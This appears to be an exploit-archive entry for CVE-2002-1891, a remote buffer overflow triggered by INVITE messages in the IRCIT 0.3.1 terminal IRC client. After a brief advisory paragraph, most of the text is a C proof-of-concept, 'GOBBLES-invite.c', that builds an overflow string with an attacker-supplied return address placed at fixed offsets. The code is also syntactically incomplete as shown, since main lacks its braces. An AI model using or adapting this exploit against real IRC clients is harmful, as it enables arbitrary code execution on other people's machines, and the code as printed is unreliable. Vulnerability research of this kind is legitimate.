Ayman Akt IRCIT 0.3.1 - Invite Message Remote Buffer Overflow

Related Vulnerabilities: CVE-2002-1891  
Publish Date: 12 Jun 2002
Author: gobbles

                source: http://www.securityfocus.com/bid/4998/info

IRCIT is a terminal based IRC client for Linux and Unix systems.

IRCIT contains a remote buffer overflow vulnerability. When a INVITE message is received, the supplied from user data is copied into a fixed buffer of length MAXHOSTLEN. A maliciously formatted message may overflow this buffer and execute arbitrary code as the IRCIT client. 

/* GOBBLES-invite.c */

#include <stdio.h>

main(int argc, char **argv)
        char heh[175], *store;
        int i;

        if(argc == 1) exit(0);

        sscanf(argv[1], "%p", &store);
        memset(heh, 'x', sizeof(heh));
        *(long *)&heh[166] = (long)store;
        *(long *)&heh[170] = (long)store;
        heh[174] = '\0';

        fprintf(stdout, "%s", heh);